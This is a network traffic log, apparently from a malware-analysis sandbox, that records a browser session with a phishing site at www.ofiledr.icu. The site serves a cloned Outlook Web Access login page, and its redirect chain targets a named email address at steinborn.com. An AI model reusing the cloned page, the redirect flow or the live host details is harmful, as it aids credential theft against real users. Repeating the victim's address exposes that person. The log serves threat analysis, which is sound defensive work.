72 2d 74 6f 70 2d 74 68 65 6d 65 50 Data Ascii: 2000rAlt-focus:focus, .ms-border-color-themeLighterAlt-before:before, .ms-bcl-tlra-h:hover, .ms-bcl-tlra-f:focus, .ms-bcl-tlra-b:before { border-color: @color-themeLighterAlt; }.ms-border-color-top-themePrimary, .ms-bcl-t-tp, .ms-border-color-top-themeP
2025-01-13 14:28:19 UTC	6	IN	Data Raw: 3a 20 31 31 70 78 Data Ascii: : 11px
2025-01-13 14:28:19 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 14:28:19 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 31 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 0d 0a Data Ascii: 2000; padding-left: 11px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; border-width: 1px; border-style: solid
2025-01-13 14:28:19 UTC	6	IN	Data Raw: 0a 20 20 20 20 20 Data Ascii:
2025-01-13 14:28:19 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 14:28:19 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 6e 65 75 74 72 61 6c 4c 69 67 68 74 2c 2e 6d 73 2d 62 63 6c 2d 6e 6c 2c 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 6e 65 75 74 72 61 6c 4c 69 67 68 74 2d 68 6f 76 65 72 3a 68 6f 76 65 72 2c 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 6e 65 75 74 72 61 6c 4c 69 67 68 74 2d 66 6f 63 75 73 3a 66 6f 63 75 73 2c 2e 6d 73 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 2d 6e 65 75 74 72 61 6c 4c 69 67 68 74 2d 62 65 66 6f 72 65 3a 62 65 66 6f 72 65 2c 2e 6d 73 2d 62 63 6c 2d 6e 6c 2d 68 3a 68 6f 76 65 72 2c 2e 6d 73 2d 62 63 6c 2d 6e 6c 2d 66 3a 66 6f 63 75 73 2c 2e 6d 73 2d 62 63 6c 2d 6e 6c 2d 62 3a 62 65 66 6f 72 Data Ascii: 2000 } .ms-border-color-neutralLight,.ms-bcl-nl,.ms-border-color-neutralLight-hover:hover,.ms-border-color-neutralLight-focus:focus,.ms-border-color-neutralLight-before:before,.ms-bcl-nl-h:hover,.ms-bcl-nl-f:focus,.ms-bcl-nl-b:befor

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.16	49723	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:20 UTC	618	OUT	GET /auth/resources/favicon.ico HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
2025-01-13 14:28:21 UTC	275	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:21 GMT Server: Apache Last-Modified: Sun, 06 Oct 2019 23:13:10 GMT Accept-Ranges: bytes Content-Length: 7886 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Connection: close Content-Type: image/x-icon
2025-01-13 14:28:21 UTC	7886	IN	Data Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 a8 10 00 00 36 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 de 10 00 00 10 10 00 00 01 00 20 00 68 04 00 00 66 1a 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 6c 00 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6 hf( @ l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.16	49724	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:22 UTC	948	OUT	POST /check.php?tap=p7mBCg9W07nEY2tzReNHAdQeksgfGq8fpkT2ic5rQTwbmLPI4F72lQtlllUBG4fWmoBFzfvss4U0MBVOWWdYCdNaTF0sTXUuEu9T2lovHJzG5JEQkPJicANgAMo08Nkg HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive Content-Length: 9 Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: null Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
2025-01-13 14:28:22 UTC	9	OUT	Data Raw: 73 65 6e 64 3d 73 65 6e 64 Data Ascii: send=send
2025-01-13 14:28:26 UTC	494	IN	HTTP/1.1 302 Found Date: Mon, 13 Jan 2025 14:28:22 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: auth?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ== X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.16	49725	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:22 UTC	417	OUT	GET /auth/resources/favicon.ico HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
2025-01-13 14:28:24 UTC	275	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:23 GMT Server: Apache Last-Modified: Sun, 06 Oct 2019 23:13:10 GMT Accept-Ranges: bytes Content-Length: 7886 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Connection: close Content-Type: image/x-icon
2025-01-13 14:28:24 UTC	7886	IN	Data Raw: 00 00 01 00 03 00 20 20 00 00 01 00 20 00 a8 10 00 00 36 00 00 00 18 18 00 00 01 00 20 00 88 09 00 00 de 10 00 00 10 10 00 00 01 00 20 00 68 04 00 00 66 1a 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c2 6c 00 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6 hf( @ l

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.16	49726	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:27 UTC	876	OUT	GET /auth?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ== HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
2025-01-13 14:28:28 UTC	362	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 14:28:27 GMT Server: Apache Location: https://www.ofiledr.icu/auth/?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ== Content-Length: 390 Connection: close Content-Type: text/html; charset=iso-8859-1
2025-01-13 14:28:28 UTC	390	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6f 66 69 6c 65 64 72 2e 69 63 75 2f 61 75 74 68 2f 3f 65 6d 61 69 6c 3d 62 6a 70 61 72 69 73 68 40 73 74 65 69 6e 62 6f 72 6e 2e 63 6f 6d 26 61 6d 70 3b 73 65 73 73 69 64 3d 4d 54 63 7a 4e 6a 63 33 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.ofiledr.icu/auth/?email=bjparish@steinborn.com&sessid=MTczNjc3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.16	49727	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:28 UTC	877	OUT	GET /auth/?email=bjparish@steinborn.com&sessid=MTczNjc3ODQ5NzAxMzZhZTNjMzhjN2FlMzQ4MmJhOTg1M2E1ZmY0NTE1ODQyNTQ2NmJjNWJjZjdlNDk4NjI2MGU2NWQ5OGJiN2MxYmVjNjUxNQ== HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
2025-01-13 14:28:29 UTC	405	IN	HTTP/1.1 302 Found Date: Mon, 13 Jan 2025 14:28:29 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.16	49728	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:30 UTC	792	OUT	GET /auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
2025-01-13 14:28:31 UTC	335	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:30 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-13 14:28:31 UTC	7857	IN	Data Raw: 32 30 30 30 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0d 0a 3c 21 2d 2d 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 31 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 4f 77 61 50 61 67 65 20 3d 20 41 53 50 2e 61 75 74 68 5f 6c 6f 67 6f 6e 5f 61 73 70 78 20 2d 2d 3e 0d 0a 0d 0a 3c 21 2d 2d 20 7b 35 37 41 31 31 38 43 36 2d 32 44 41 39 2d 34 31 39 64 2d 42 45 39 41 2d 46 39 32 42 30 46 39 41 34 31 38 42 7d 20 2d 2d 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c Data Ascii: 2000<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">... Copyright (c) 2011 Microsoft Corporation. All rights reserved. -->... OwaPage = ASP.auth_logon_aspx -->... {57A118C6-2DA9-419d-BE9A-F92B0F9A418B} --><html><head><
2025-01-13 14:28:31 UTC	341	IN	Data Raw: 65 72 0d 0a 7b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 0d 0a 09 63 6f 6c 6f 72 3a 23 30 30 37 32 43 36 3b 0d 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 27 77 66 5f 73 65 67 6f 65 2d 75 69 5f 6e 6f 72 6d 61 6c 27 2c 20 27 53 65 67 6f 65 20 55 49 27 2c 20 27 53 65 67 6f 65 20 57 50 27 2c 20 54 61 68 6f 6d 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 74 77 69 64 65 20 2e 73 69 67 6e 49 6e 45 6e 74 65 72 0d 0a 7b 0d 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 37 70 78 3b 0d 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 39 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 74 6e 61 72 72 6f 77 20 2e 73 69 67 6e 49 6e 45 6e 74 65 72 20 0d 0a 7b 0d 0a 09 6d 61 72 67 69 6e 2d Data Ascii: er{font-size:22px;color:#0072C6;font-family:'wf_segoe-ui_normal', 'Segoe UI', 'Segoe WP', Tahoma, Arial, sans-serif;margin-top:20px;}.twide .signInEnter{margin-top:17px;font-size: 29px;}.tnarrow .signInEnter {margin-
2025-01-13 14:28:31 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 14:28:31 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 69 67 6e 69 6e 62 75 74 74 6f 6e 20 0d 0a 7b 0d 0a 20 20 20 20 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 0d 0a 7d 0d 0a 0d 0a 2e 6d 6f 75 73 65 20 2e 73 69 67 6e 69 6e 62 75 74 74 6f 6e 0d 0a 7b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 20 38 70 78 20 35 70 78 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 72 74 6c 20 2e 6d 6f 75 73 65 20 2e 73 69 67 6e 69 6e 62 75 74 74 6f 6e 0d 0a 7b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 2d 38 70 78 3b 0d 0a 7d 0d 0a 0d 0a 2e 74 6e 61 72 72 6f 77 20 2e 73 69 67 6e 69 6e 62 75 74 74 6f 6e 20 0d 0a 7b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 Data Ascii: 2000igninbutton { cursor:pointer; display:inline}.mouse .signinbutton{ padding: 0px 8px 5px 8px; margin-left: -8px;}.rtl .mouse .signinbutton{ margin-right: -8px;}.tnarrow .signinbutton {position: re
2025-01-13 14:28:31 UTC	6	IN	Data Raw: 20 20 20 20 20 20 Data Ascii:
2025-01-13 14:28:31 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 14:28:31 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 20 20 20 20 6f 20 3d 20 6f 46 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 57 65 27 72 65 20 72 65 70 6c 61 63 69 6e 67 20 73 6f 6d 65 74 68 69 6e 67 20 6f 74 68 65 72 20 74 68 61 6e 20 74 68 65 20 63 75 72 72 65 6e 74 20 66 72 61 6d 65 2c 20 20 77 65 27 6c 6c 20 6a 75 73 74 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 6c 6f 67 20 62 61 63 6b 20 69 6e 20 74 6f 20 74 68 65 20 64 65 66 61 75 6c 74 20 73 74 61 72 74 20 70 61 67 65 20 69 66 20 74 68 65 20 66 72 61 6d 65 20 64 6f 65 73 6e 27 74 20 70 72 6f 76 69 64 65 20 61 20 75 72 6c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 20 66 6f 72 20 72 65 6c 6f 67 6f 6e 2e 20 54 68 65 20 66 72 61 6d 65 20 73 68 6f 75 6c 64 20 70 72 6f 76 69 64 65 20 61 20 67 6c 6f 62 61 Data Ascii: 2000 o = oF; // We're replacing something other than the current frame, we'll just // log back in to the default start page if the frame doesn't provide a url // for relogon. The frame should provide a globa
2025-01-13 14:28:31 UTC	6	IN	Data Raw: 20 6e 75 6c 6c 20 Data Ascii: null
2025-01-13 14:28:31 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-13 14:28:31 UTC	8192	IN	Data Raw: 31 65 64 38 0d 0a 21 3d 20 6d 69 6d 65 4c 6f 67 6f 66 66 45 32 6b 33 29 20 26 26 20 49 73 4d 69 6d 65 43 74 6c 49 6e 73 74 28 22 4d 69 6d 65 42 68 76 72 2e 4d 69 6d 65 43 74 6c 56 65 72 22 29 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6d 65 4c 6f 67 6f 66 66 45 32 6b 33 2e 4c 6f 67 6f 66 66 28 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 28 74 79 70 65 6f 66 20 28 6d 69 6d 65 4c 6f 67 6f 66 66 45 32 6b 37 53 50 31 29 20 21 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 20 26 26 20 6e 75 6c 6c 20 21 3d 20 6d 69 6d 65 4c 6f 67 6f 66 66 45 32 6b 37 53 50 31 29 20 26 26 20 49 73 4d 69 6d 65 43 74 6c 49 6e 73 74 28 22 4f 77 61 53 4d 69 6d 65 2e 4d 69 6d 65 43 74 6c 56 65 72 22 29 29 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6d 65 4c 6f 67 6f 66 Data Ascii: 1ed8!= mimeLogoffE2k3) && IsMimeCtlInst("MimeBhvr.MimeCtlVer")) mimeLogoffE2k3.Logoff(); if ((typeof (mimeLogoffE2k7SP1) != "undefined" && null != mimeLogoffE2k7SP1) && IsMimeCtlInst("OwaSMime.MimeCtlVer")) mimeLogof

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.16	49730	111.90.140.57	443	6272	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 14:28:32 UTC	698	OUT	GET /auth/resources/segoeui-regular.ttf HTTP/1.1 Host: www.ofiledr.icu Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Origin: https://www.ofiledr.icu sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: font Referer: https://www.ofiledr.icu/auth/login.php?c=UKlJ&replaceCurrent=1&url=http%3A%2F%2Fsteinborn.com Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=40332551ec4a203db3b8e8949b2fd8d5
2025-01-13 14:28:34 UTC	272	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 14:28:33 GMT Server: Apache Last-Modified: Sun, 06 Oct 2019 23:13:44 GMT Accept-Ranges: bytes Content-Length: 56760 X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Connection: close Content-Type: font/ttf
2025-01-13 14:28:34 UTC	7920	IN	Data Raw: 00 01 00 00 00 12 01 00 00 04 00 20 4c 54 53 48 6a a8 ad 70 00 00 01 2c 00 00 00 e9 4f 53 2f 32 4a 55 76 98 00 00 02 18 00 00 00 60 56 44 4d 58 76 58 7d d3 00 00 02 78 00 00 05 e0 63 6d 61 70 36 ce 14 f7 00 00 08 58 00 00 01 c2 63 76 74 20 7c b5 5d aa 00 00 0a 1c 00 00 0a 1e 66 70 67 6d bd 3c 2a ff 00 00 14 3c 00 00 09 83 67 61 73 70 00 1b 00 23 00 00 1d c0 00 00 00 10 67 6c 79 66 b4 e7 47 7b 00 00 1d d0 00 00 7a 8a 68 64 6d 78 70 98 bf e6 00 00 98 5c 00 00 0f 70 68 65 61 64 e2 18 80 46 00 00 a7 cc 00 00 00 36 68 68 65 61 10 cb 07 42 00 00 a8 04 00 00 00 24 68 6d 74 78 b1 01 5b 26 00 00 a8 28 00 00 03 94 6b 65 72 6e 8d e9 8b c1 00 00 ab bc 00 00 1f c2 6c 6f 63 61 00 3d 5e c6 00 00 cb 80 00 00 03 98 6d 61 78 70 06 55 02 29 00 00 cf 18 00 00 00 20 6e 61 6d Data Ascii: LTSHjp,OS/2JUv`VDMXvX}xcmap6Xcvt \|]fpgm<*<gasp#glyfG{zhdmxp\pheadF6hheaB$hmtx[&(kernloca=^maxpU) nam
2025-01-13 14:28:34 UTC	8000	IN	Data Raw: 07 18 1c 1f 09 08 19 08 17 1d 1e 0a 0b 16 0b 14 11 10 0d 0c 15 0c 09 0d 10 1f 04 03 e2 06 11 14 17 1d 04 02 e2 40 1b 06 1b 06 1a 0b 00 07 10 07 02 09 07 07 21 16 1a 03 04 00 00 19 1a 0e 07 0f 08 01 0c 03 08 08 21 0c 0c 16 42 12 0e 0e 15 16 0b 60 0c 70 0c 02 0c 2f 5d 33 cd 32 33 2f c6 2b 11 12 01 39 18 2f 5f 5e 5d 33 e1 32 32 2f c6 00 3f c4 12 39 2f 5e 5d c4 12 39 39 2f 2f 1a ed 17 39 10 ed 17 39 31 30 10 87 05 c0 c0 c0 c0 10 87 c0 c0 c0 c0 10 87 c0 c0 c0 c0 10 87 c0 c0 c0 c0 01 5d 5d 01 07 21 03 21 07 21 03 23 13 23 03 23 13 21 37 21 13 21 37 21 13 33 03 33 13 33 03 07 23 03 33 04 8e 17 fe fb 3f 01 19 1b fe ed 58 7e 56 fa 54 7d 54 fe fa 14 01 09 3d fe eb 15 01 15 54 7e 54 fc 56 7b 54 91 fc 42 fe 04 08 6a fe d4 6a fe 73 01 8d fe 73 01 8d 6a 01 2c 6a 01 92 Data Ascii: @!!B`p/]323/+9/_^]322/?9/^]99//9910]]!!!###!7!!7!333#3?X~VT}T=T~TV{TBjjssj,j
